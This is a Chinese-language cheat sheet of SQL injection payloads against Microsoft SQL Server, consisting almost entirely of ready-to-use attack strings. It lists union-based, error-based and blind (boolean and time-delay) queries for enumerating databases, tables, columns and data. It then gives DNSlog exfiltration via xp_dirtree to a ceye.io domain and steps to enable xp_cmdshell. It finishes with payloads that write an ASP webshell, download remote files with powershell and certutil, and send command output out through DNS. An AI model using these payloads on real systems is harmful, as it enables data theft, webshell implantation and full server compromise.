联合查询注入

order by 4--

union select name,null,null,null from master..sysdatabases--  //查询数据库名

union select top 1 name,null,null,null from master..sysdatabases where name not in('master','flag')-- //分多次查询

union select name,null,null,null from test..sysobjects where xtype='u'--  //查询表名

union select name,null,null,null from test..syscolumns where xtype='239'--  //查询字段名

union select [字段名],null,null,null from [数据库名]..[表名]--  //查询数据

union select top 1 COLUMN_NAME,null,null,null from [数据库名].information_schema.columns where TABLE_NAME='[表名]'--

union select top 1 name,null,null,null from [数据库名].sys.all_objects where type='U' AND is_ms_shipped=0 --

报错注入

1、判断数据库类型

and exists (select * from sysobjects)--

and exists (select count(*) from sysobjects)--

2、判断数据库版本

and 1=@@version--  //适用于有回显

and substring((select @@version),22,4)='2008'--  //适用于无回显，盲注

and 1=convert(int,(@@version))

and 1=convert(int,(user))--  //查看连接数据库的用户

3、获取数据库个数（dbid从1-4的数据库一般为系统数据库）

and 1=(select quotename(count(name)) from master..sysdatabases)--

and 1=(select cast(count(name) as varchar)%2bchar(1) from master..sysdatabases) --

and 1=(select str(count(name))%2b'|' from master..sysdatabases where dbid>0) --

and 1=(select cast(count(name) as varchar)%2bchar(1) from master..sysdatabases where  dbid>0) --

4、获取全部数据库名称（版本>=2005)

and 1=(select quotename(name) from master..sysdatabases FOR XML PATH(''))--

and 1=(select '|'%2bname%2b'|' from master..sysdatabases FOR XML PATH(''))--

and 1=convert(int,(select quotename(name) from master..sysdatabases FOR XML PATH('')))-- 全部库名

5、获取当前数据库名称

and db_name()>0

and 1=(select db_name())--

and 1=convert(int,(db_name()))

6、获取全部表名（版本>=2005）

and 1=(select quotename(name) from [数据库名]..sysobjects where xtype='U' FOR XML PATH(''))--

and 1=(select '|'%2bname%2b'|' from [数据库名]..sysobjects where xtype='U' FOR XML PATH(''))--

and 1=convert(int,(select top 1 table_name from [数据库名].information_schema.tables where table_name not in ('[第一个表名]')))--

7、获取全部列名（版本>=2005）

and 1=(select quotename(name) from [数据库名]..syscolumns where id =(select id from [数据库名]..sysobjects where name='[指定表名]') FOR XML PATH(''))--

and 1=(select '|'%2bname%2b'|' from [数据库名]..syscolumns where id =(select id from [数据库名]..sysobjects where name='[指定表名]') FOR XML PATH(''))--

8、获取数据

and 1=(select top 1 name from [数据库名]..[表名] where name not in ('xxx'))--

9、爆列名

having 1=1--

group by [第一个列名],[第二个列名] having 1=1--

盲注

1、Ascii

and ascii(substring((select top 1 name from master.dbo.sysdatabases),1,1)) >= 109--

2、时间盲注

;wait for delay '0:0:5'--

;if system_user='root' wait for delay  '0:0:5'--

;if(1=(select is_srvrolemember('sysadmin'))) WAITFOR DELAY '0:0:5';--

3、DNSlog

;declare @a char(128);set @a='\\'%2buser%2b'.xxx.ceye.io\abc';exec master..xp_dirtree @a;--  //user名

;declare @a char(128);set @a='\\'%2b(select top 1 name from master.dbo.sysdatabases)%2b'.xxx.ceye.io\abc';exec master..xp_dirtree @a;-- //数据库名

4、基于xp_cmdshell获取webshell

;if(host_name()=@@servername) WAITFOR DELAY '0:0:5';--  //判断是否是站库分离，若延时则不分离

;if(1=(select count(*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell')) WAITFOR DELAY '0:0:2'--  //查看是否有XP_cmdshell

;exec sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'--  //恢复xp_cmdshell

;EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;--  //启用xp_cmdshell

;use tempdb;create table tt_tmp (tmp1 varchar(1000));--  //在数据库tempdb下创建临时表tt_tmp

;use tempdb;insert into tt_tmp(tmp1) exec master..xp_cmdshell 'dir /s /b d:\1.txt';--  //查找文件并把路径写入到表tt_tmp

5、写入一句话

;exec master..xp_cmdshell 'echo ^<script language=vbs runat=server^>eval(request("c"))^</script^> > c:\\inetpub\\wwwroot\\shell.asp';--

6、远程下载

;exec master..xp_cmdshell 'powershell -exec bypass -c (new-object  System.Net.WebClient).DownloadFile('http://ip','E:\test.php')';--

;exec master..xp_cmdshell 'certutil -urlcache -split -f http://ip/1.txt E:/test.php';--

7、使用DNSlog执行命令并查看回显，有可能会乱码

;exec master..xp_cmdshell "whoami>c:\temp%26%26certutil -encode c:\temp c:\temp2%26%26findstr /L /V ""CERTIFICATE"" c:\temp2>c:\temp3";exec master..xp_cmdshell "cmd /v /c""set /p MYVAR=< c:\temp3 %26%26 set FINAL=!MYVAR!.xxx.ceye.io %26%26 ping !FINAL!""";exec master..xp_cmdshell "del ""c:\temp"" ""c:\temp2"" ""c:\temp3""";--